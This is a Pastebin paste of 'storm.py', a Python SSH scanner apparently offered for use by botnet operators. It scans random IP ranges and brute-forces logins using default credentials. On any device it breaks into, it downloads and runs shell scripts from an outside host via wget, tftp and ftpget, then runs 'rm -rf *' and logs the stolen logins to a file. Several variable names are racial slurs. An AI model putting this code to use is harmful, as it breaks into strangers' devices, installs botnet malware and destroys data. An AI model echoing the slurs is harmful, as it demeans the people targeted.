Advertisement
DenialWars

storm.py ( Python Scanner )

May 20th, 2017
432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.81 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. # Step 1 - ulimit -n 999999
  4. # Step 2- python storm.py 500 ROOT 1 1 or python storm.py 500 LUCKY3 1 1
  5. #You can buy more ranges (191 186 dm me for more
  6. #@StormyServices or @Cayote
  7.  
  8. import threading, paramiko, random, socket, time, sys
  9.  
  10. paramiko.util.log_to_file("/dev/null")
  11.  
  12.  
  13. blacklist = [
  14. '127'
  15. ]
  16.  
  17.  
  18. passwords = [
  19. "telnet:telnet"
  20. "admin:1234",
  21. "root:root",
  22. "root:admin",
  23. "user:user",
  24. "guest:guest",
  25. "admin:admin"
  26.  
  27. ]
  28.  
  29. if sys.argv[4] == '1':
  30. passwords = ["root:root"]
  31. if sys.argv[4] == '2':
  32. passwords = ["guest:guest"]
  33. if sys.argv[4] == '3':
  34. passwords = ["admin:1234"]
  35. if sys.argv[4] == '4':
  36. passwords = ["telnet:telnet"]
  37. if sys.argv[4] == '5':
  38. passwords = ["root:root", "admin:1234"]
  39. if sys.argv[4] == '6':
  40. passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  41. if sys.argv[4] == '7':
  42. passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password", "admin:admin", "user:user", "test:test", "admin:12345", "admin:123456", "guest:guest", "root:password"]
  43. if sys.argv[4] == '8':
  44. passwords = ["root:root", "root:admin"]
  45. if sys.argv[4] == '9':
  46. passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  47. if sys.argv[4] == 'perl':
  48. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
  49. if sys.argv[4] == 'vps':
  50. passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Zero", "root:Password"]
  51. if sys.argv[4] == 'vps2':
  52. passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
  53.  
  54. print "\x1b[32mStorm Has Been Executed..."
  55. print "\x1b[31mStorm Is Activating"
  56. time.sleep(1)
  57. print "\x1b[32mStorm Has Been Activated"
  58.  
  59. ipclassinfo = sys.argv[2]
  60. if ipclassinfo == "A":
  61. ip1 = sys.argv[3]
  62. elif ipclassinfo == "B":
  63. ip1 = sys.argv[3].split(".")[0]
  64. ip2 = sys.argv[3].split(".")[1]
  65. elif ipclassinfo == "C":
  66. ips = sys.argv[3].split(".")
  67. num=0
  68. for ip in ips:
  69. num=num+1
  70. if num == 1:
  71. ip1 = ip
  72. elif num == 2:
  73. ip2 = ip
  74. elif num == 3:
  75. ip3 = ip
  76. class sshscanner(threading.Thread):
  77. global passwords
  78. global ipclassinfo
  79. if ipclassinfo == "A":
  80. global ip1
  81. elif ipclassinfo == "B":
  82. global ip1
  83. global ip2
  84. elif ipclassinfo == "C":
  85. global ip1
  86. global ip2
  87. global ip3
  88. def run(self):
  89. while 1:
  90. try:
  91. while 1:
  92. thisipisbad='no'
  93. if ipclassinfo == "A":
  94. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  95. if ipclassinfo == "B":
  96. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  97. if ipclassinfo == "C":
  98. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  99. if ipclassinfo == "49":
  100. hAZZYE = ["49.144","49.145","49.146","49.147","49.148","49.149","49.150","49.151","49.228"]
  101. self.host = random.choice(hAZZYE)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  102. if ipclassinfo == "122":
  103. Nigger = ["122.3","122.2","122.52","122.54","122.174","122.237","122.176","122.166","122.172","122.163","122.179"]
  104. self.host = random.choice(Nigger)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  105. if ipclassinfo == "NIGGER":
  106. Beaner = ["186.232","186.119","186.39","122.164","186.59","131.255","186.250","200.33","186.57","186.61","186.134","186.128"]
  107. self.host = random.choice(Beaner)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  108. if ipclassinfo == "119":
  109. SHIT = ["119.91","119.92","119.93","119.94","119.95"]
  110. self.host = random.choice(SHIT)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  111. if ipclassinfo == "FAST_1":
  112. fast1 = fast1 = [ "5.78","1.20","122.170","122.164","201.176","200.33","131.255" ]
  113. self.host = random.choice(fast1)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  114. if ipclassinfo == "FAST_2":
  115. fast = fast = [ "59.69","124.107","112.209","49.228","49.150","49.149","122.2" ]
  116. self.host = random.choice(fast)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  117. if ipclassinfo == "FAST_3":
  118. fast3 = fast3 = [ "12.188","14.162","14.33","13.92","103.57","14.67","14.177" ]
  119. self.host = random.choice(fast3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  120. if ipclassinfo == "ADMIN":
  121. fast3 = fast3 = [ "31.23","2.60","188.114","49.79","122.58","201.71" ]
  122. self.host = random.choice(fast3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  123. if ipclassinfo == "ROOT":
  124. fast5 = fast5 = [ "186.59","186.61","186.114","186.39","186.128","186.133" ]
  125. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  126. if ipclassinfo == "190":
  127. fast5 = fast5 = [ "190.174","190.175","190.173","190.172","190.176","190.177" ]
  128. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  129. if ipclassinfo == "191":
  130. fast5 = fast5 = [ "191.80","191.81","191.82","191.83","191.84","191.85" ]
  131. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  132. if ipclassinfo == "112":#"179.40","179.39","179.38","179.37","179.36"
  133. fast5 = fast5 = [ "112.206","112.205","112.203","112.202","112.201" ]
  134. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  135. if ipclassinfo == "179":#"179.40","179.39","179.38","179.37","179.36"
  136. fast5 = fast5 = [ "179.40","179.39","179.38","179.37","179.36" ]
  137. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  138. if ipclassinfo == "LUCKY3":
  139. lucky3 = [ "188.245", "181.20", "181.24", "186.128", "186.132", "186.39", "186.56", "186.57", "186.58", "186.60" ]
  140. self.host = random.choice(lucky3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  141. elif ipclassinfo == "LRAB":
  142. lrabz = ["122","186","119","168"]
  143. self.host = random.choice(lrabz)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  144. elif ipclassinfo == "LUCKY":
  145. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24","180.180"]
  146. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  147. elif ipclassinfo == "LUCKY1":
  148. lucky1 = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","1.20"]
  149. self.host = random.choice(lucky1)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  150. elif ipclassinfo == "LUCKY2":
  151. lucky2 = lucky2 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91" ]
  152. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  153. elif ipclassinfo == "LUCKY22":
  154. lucky22 = lucky22 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91","49.144","49.145","49.146","49.147","49.148","49.149","49.150","180.180" ]
  155. self.host = random.choice(lucky22)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  156. for badip in blacklist:
  157. if badip in self.host:
  158. thisipisbad='yes'
  159. if thisipisbad=='no':
  160. break
  161. username='root'
  162. password=""
  163. port = 22
  164. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  165. s.settimeout(1)
  166. s.connect((self.host, port))
  167. s.close()
  168. ssh = paramiko.SSHClient()
  169. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  170. dobreak=False
  171. for passwd in passwords:
  172. if ":n/a" in passwd:
  173. password=""
  174. else:
  175. password=passwd.split(":")[1]
  176. if "n/a:" in passwd:
  177. username=""
  178. else:
  179. username=passwd.split(":")[0]
  180. try:
  181. ssh.connect(self.host, port = port, username=username, password=password, timeout=1)
  182. dobreak=True
  183. break
  184. except:
  185. pass
  186. if True == dobreak:
  187. break
  188. badserver=True
  189. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  190. output = stdout.read()
  191. if "inet addr" in output:
  192. badserver=False
  193. if badserver == False:
  194. print '\x1b[31mScanning IP~>\x1b[34m '+self.host+'|'+username+'|'+password+'|'+str(port)
  195. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.98.51/kittyhaxz.sh; chmod 777 kittyhaxz.sh; sh kittyhaxz.sh; tftp 87.121.98.51 -c get ktftp1.sh; chmod 777 ktftp1.sh; sh ktftp1.sh; tftp -r ktftp2.sh -g 87.121.98.51; chmod 777 ktftp2.sh; sh ktftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 87.121.98.51 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf kittyhaxz.sh ktftp1.sh ktftp2.sh ftp1.sh; rm -rf *")
  196. nigger = open("bots.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  197. ssh.close()
  198. time.sleep(10)
  199.  
  200.  
  201. except:
  202. pass
  203.  
  204. for x in range(0,int(sys.argv[1])):
  205. try:
  206. t = sshscanner()
  207. t.start()
  208. except:
  209. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement